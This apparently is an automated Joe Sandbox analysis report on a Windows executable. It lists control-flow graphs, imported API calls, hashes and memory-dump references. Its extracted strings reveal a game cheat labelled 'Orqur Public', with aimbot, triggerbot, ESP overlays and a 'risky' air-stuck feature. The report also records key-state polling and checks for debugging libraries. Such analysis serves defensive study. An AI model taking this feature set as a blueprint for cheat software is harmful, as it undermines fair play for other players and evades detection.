                                                                                                                                                                          • Instruction ID: f4d3b892f67292fe720c9fad312042cf5426e3b4d021e31d36062defcee3093d
                                                                                                                                                                          • Opcode Fuzzy Hash: 86faf16ee390c8af09e715d5af5e24c96e4af863d05e289d530ff53a92d4c083
                                                                                                                                                                          • Instruction Fuzzy Hash: 1A918623E68BC5C5E711DB34D8852F96361FB99348F506335E98C96A55EF7CE284C300

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 267 7ff67418a650-7ff67418a685 268 7ff67418a68e-7ff67418a6a1 267->268 269 7ff67418a687-7ff67418a689 267->269 271 7ff67418a773-7ff67418a778 call 7ff674171400 268->271 272 7ff67418a6a7-7ff67418a6aa 268->272 270 7ff67418a75b-7ff67418a772 269->270 286 7ff67418a779-7ff67418a7ba call 7ff674171360 271->286 273 7ff67418a723-7ff67418a72a 272->273 274 7ff67418a6ac-7ff67418a6b6 272->274 276 7ff67418a72f-7ff67418a738 273->276 277 7ff67418a72c 273->277 278 7ff67418a6e7-7ff67418a6fa 274->278 279 7ff67418a6b8-7ff67418a6c5 274->279 281 7ff67418a753-7ff67418a757 276->281 282 7ff67418a73a 276->282 277->276 284 7ff67418a71c-7ff67418a71f 278->284 285 7ff67418a6fc-7ff67418a703 278->285 283 7ff67418a6c9-7ff67418a6d7 call 7ff67418cf54 279->283 281->270 287 7ff67418a740-7ff67418a751 282->287 296 7ff67418a710-7ff67418a716 _invalid_parameter_noinfo_noreturn 283->296 297 7ff67418a6d9-7ff67418a6e5 283->297 284->273 289 7ff67418a705-7ff67418a70c 285->289 290 7ff67418a717 call 7ff67418cf54 285->290 298 7ff67418a7c3-7ff67418a7cf 286->298 299 7ff67418a7bc-7ff67418a7c2 286->299 287->281 287->287 289->286 293 7ff67418a70e 289->293 290->284 293->283 296->290 297->284 300 7ff67418a7d1-7ff67418a7d3 298->300 301 7ff67418a7d5-7ff67418a7dd 298->301 299->298 302 7ff67418a803 300->302 303 7ff67418a7df-7ff67418a7e2 301->303 304 7ff67418a801 301->304 307 7ff67418a806-7ff67418a80c 302->307 303->304 306 7ff67418a7e4-7ff67418a7ff ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ 303->306 304->302 306->307 308 7ff67418a812-7ff67418a835 307->308 309 7ff67418a8d4-7ff67418a902 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z ?uncaught_exceptions@std@@YAHXZ 307->309 312 7ff67418a870-7ff67418a88b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 308->312 313 7ff67418a837-7ff67418a83c 308->313 310 7ff67418a90e-7ff67418a91d 309->310 311 7ff67418a904-7ff67418a90d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ 309->311 314 7ff67418a91f-7ff67418a925 310->314 315 7ff67418a926-7ff67418a93a 310->315 311->310 318 7ff67418a88e 312->318 316 7ff67418a83e-7ff67418a841 313->316 317 7ff67418a892-7ff67418a897 313->317 314->315 321 7ff67418a843-7ff67418a86b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 316->321 322 7ff67418a86d 316->322 319 7ff67418a8c4 317->319 320 7ff67418a899-7ff67418a89c 317->320 318->317 319->309 320->319 323 7ff67418a89e-7ff67418a8c2 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z 320->323 321->313 322->312 323->318
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF674171400: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF67417140B
                                                                                                                                                                            • Part of subcall function 00007FF674171400: __std_exception_copy.VCRUNTIME140 ref: 00007FF674171444
                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418A779
                                                                                                                                                                            • Part of subcall function 00007FF674171360: __std_exception_copy.VCRUNTIME140 ref: 00007FF6741713A4
                                                                                                                                                                          • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A7E7
                                                                                                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A854
                                                                                                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A87D
                                                                                                                                                                          • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A8AF
                                                                                                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A8F3
                                                                                                                                                                          • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A8FA
                                                                                                                                                                          • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF674172731), ref: 00007FF67418A907
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$__std_exception_copy$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Concurrency::cancel_current_taskOsfx@?$basic_ostream@V12@Xlength_error@std@@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1116575367-0
                                                                                                                                                                          • Opcode ID: 484e8cd68b747e1a7008488e7f13651302e9ea2e94a207525d94ac8665bedf14
                                                                                                                                                                          • Instruction ID: d7b1811f687b954f9ecc0c8aa2d850ff3623e0c012d65bbc7f24b0a10a072243
                                                                                                                                                                          • Opcode Fuzzy Hash: 484e8cd68b747e1a7008488e7f13651302e9ea2e94a207525d94ac8665bedf14
                                                                                                                                                                          • Instruction Fuzzy Hash: 1681A523A19B81C6EB20AF59E5C823977A4EB45BE1F148631DB5E877A4DF3DD442C300

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Current$BaseEnumModuleModulesName_stricmp
                                                                                                                                                                          • String ID: dbgcore.dll$dbghelp.dll
                                                                                                                                                                          • API String ID: 3352702578-4118436743
                                                                                                                                                                          • Opcode ID: 1052afd27c4696830c52129737457caf9a589378738caca0c6bd51082e8aeeab
                                                                                                                                                                          • Instruction ID: fc228b9eb7e4a7c4c768852a26df286dd935f393018548e041ba8ac188230d26
                                                                                                                                                                          • Opcode Fuzzy Hash: 1052afd27c4696830c52129737457caf9a589378738caca0c6bd51082e8aeeab
                                                                                                                                                                          • Instruction Fuzzy Hash: B2213533A2CB82D1EA61AB10F48D2BA73A4FB89B84F444132DA8D83764DF3CD555CB00

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 340 7ff67418a530-7ff67418a561 call 7ff674172230 343 7ff67418a563 340->343 344 7ff67418a595-7ff67418a5a9 340->344 343->344 345 7ff67418a565-7ff67418a57f 343->345 346 7ff67418a5b0-7ff67418a5c2 call 7ff674172230 344->346 347 7ff67418a581-7ff67418a58b 345->347 348 7ff67418a592 345->348 352 7ff67418a5c4-7ff67418a5ce 346->352 353 7ff67418a636-7ff67418a64a 346->353 347->348 350 7ff67418a58d-7ff67418a590 347->350 348->344 350->344 352->353 354 7ff67418a5d0-7ff67418a5d9 352->354 355 7ff67418a5f8 354->355 356 7ff67418a5db-7ff67418a5f6 Sleep 354->356 357 7ff67418a608-7ff67418a626 355->357 358 7ff67418a5fa-7ff67418a606 Sleep 355->358 356->346 359 7ff67418a628 357->359 360 7ff67418a62a-7ff67418a631 Sleep SleepEx 357->360 358->346 359->360 360->353
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$Query_perf_counterQuery_perf_frequency
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1739919806-0
                                                                                                                                                                          • Opcode ID: 6e81b4ebca20e304169579ec35ae851d94c4c4444661d0863d96975d93279f40
                                                                                                                                                                          • Instruction ID: c33ca004562b540500a979c8e6eed52d9bdad41aa679c3618464e0555b446d14
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e81b4ebca20e304169579ec35ae851d94c4c4444661d0863d96975d93279f40
                                                                                                                                                                          • Instruction Fuzzy Hash: 3521CC13B3934AC3EE187705B1981B99255DF88BE0F585135DE5D4F7C5ED2CE4814700

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2168557111-0
                                                                                                                                                                          • Opcode ID: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
                                                                                                                                                                          • Instruction ID: e889e76c2000f3d05a03f5cf3eae1354a4116e872fb0e761a3b1d52c18a8b66e
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c8e80d9ca3e2c7b43a2e1ea7777abfe8b5e07f2f4ec2fbcf44e96190c50b72e
                                                                                                                                                                          • Instruction Fuzzy Hash: D4E03033608B81C2D6009B50F94846AB7A4FB987D4F904035EBCC47A24CF7CC165CB40

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Random_device@std@@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1041445435-0
                                                                                                                                                                          • Opcode ID: fc5320cb8c62f15217a6e70bccb0b4cdd85a0c930d45a54f5e88c419ab7f7442
                                                                                                                                                                          • Instruction ID: 767eb27bf3aa62a89aaaac8018c5eacdf0a627f8c817a89c7544c6a5f176f914
                                                                                                                                                                          • Opcode Fuzzy Hash: fc5320cb8c62f15217a6e70bccb0b4cdd85a0c930d45a54f5e88c419ab7f7442
                                                                                                                                                                          • Instruction Fuzzy Hash: 76114273B38781C6EB64AB64F4AA3BA6295FBC9350F505135E64ED2BD5EE2CD2048600

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 379 7ff674141000-7ff674141016 GetSystemMetrics
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4116985748-0
                                                                                                                                                                          • Opcode ID: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
                                                                                                                                                                          • Instruction ID: b056c90078ea4fae1eb87307546ae39d8263bc9dbe71176e8afd02896bfaa16f
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f38d4103dd383ce7011d925abf406c2c39e63471424fb4dbc7d99e96c52857d
                                                                                                                                                                          • Instruction Fuzzy Hash: A2B092A5E256C2C6DB087B32AC8A03826606B08241FA00439C50A81310CD2D51964F00
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetAsyncKeyState.USER32 ref: 00007FF67417B313
                                                                                                                                                                            • Part of subcall function 00007FF674153190: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741531F3
                                                                                                                                                                            • Part of subcall function 00007FF674153190: memcpy.VCRUNTIME140 ref: 00007FF674153213
                                                                                                                                                                            • Part of subcall function 00007FF674153190: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153233
                                                                                                                                                                            • Part of subcall function 00007FF67417A3D0: CreateThread.KERNEL32 ref: 00007FF67417A4BA
                                                                                                                                                                            • Part of subcall function 00007FF67417A3D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417A4F5
                                                                                                                                                                          • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417CE80
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417D10D
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8
                                                                                                                                                                            • Part of subcall function 00007FF674173980: memset.VCRUNTIME140 ref: 00007FF6741739B0
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A00
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A12
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A24
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A36
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A48
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A5A
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A6C
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173A7E
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173A90
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AA2
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z.MSVCP140 ref: 00007FF674173AB4
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AC6
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AD8
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AEA
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173AFC
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B0E
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B20
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B32
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B44
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B56
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B68
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B7A
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z.MSVCP140 ref: 00007FF674173B8C
                                                                                                                                                                            • Part of subcall function 00007FF674173980: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z.MSVCP140 ref: 00007FF674173B9E
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417D1AD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??5?$basic_istream@D@std@@@std@@U?$char_traits@V01@$_invalid_parameter_noinfo_noreturn$memcpy$AsyncCreateStateThreadexitfreemallocmemset
                                                                                                                                                                          • String ID: ##Main$##Main1$##Mains$%.0f$%.3f$(AIR STUCK)RISKY FEATURE:$@$Aimbot$Air Stuck$Box$Combat$Config$Corner$Distance$Draw Filled$Filled Fov$Fov Arrows$Fov Circle$Fov Size$Hitbox$Legit Config$Load Config$Misc$Options$Orqur Public$Prediction$Prediction $Prediction $Prediction $Rage Config$Rank$Render Count$Rifle Fov$Rifle Settings$Rifle Smooth$SMG Fov$SMG Settings$SMG Smooth$Save Config$Save/Load$Semi Config$Shotgun Fov$Shotgun Settings$Shotgun Smooth$Skeleton$Smoothing$Snapline$Sniper Fov$Sniper Settings$Sniper Smooth$Triggerbot$Triggerbot Delay (ms)$Triggerbot Distance (m)$Unload$Username$Visuals$Weapon$Weapon config$config.json
                                                                                                                                                                          • API String ID: 2312794053-2218353132
                                                                                                                                                                          • Opcode ID: f4ef39a047af63edb0383367f3846a446bd321a8a066d4b4e0c68740367521f1
                                                                                                                                                                          • Instruction ID: 16cadfca35499fdab12953ebb6ab927e724e1ad5a34241bc3a6718051290c3dd
                                                                                                                                                                          • Opcode Fuzzy Hash: f4ef39a047af63edb0383367f3846a446bd321a8a066d4b4e0c68740367521f1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1623B173928A86C6E701EB29D4852F97760FB99784F158336DA4D977A1EF7CE084CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          • _CxxThrowException.VCRUNTIME140 ref: 00007FF674177613
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E8E8
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: memcpy.VCRUNTIME140(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E988
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67417E9A6
                                                                                                                                                                            • Part of subcall function 00007FF67417E8B0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF6741718E5), ref: 00007FF67417E965
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178CF4
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178D35
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178D76
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178DB5
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178DF4
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178E33
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178E72
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178EB1
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178EF0
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178F2F
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178F6E
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178FB3
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674178FF8
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417903D
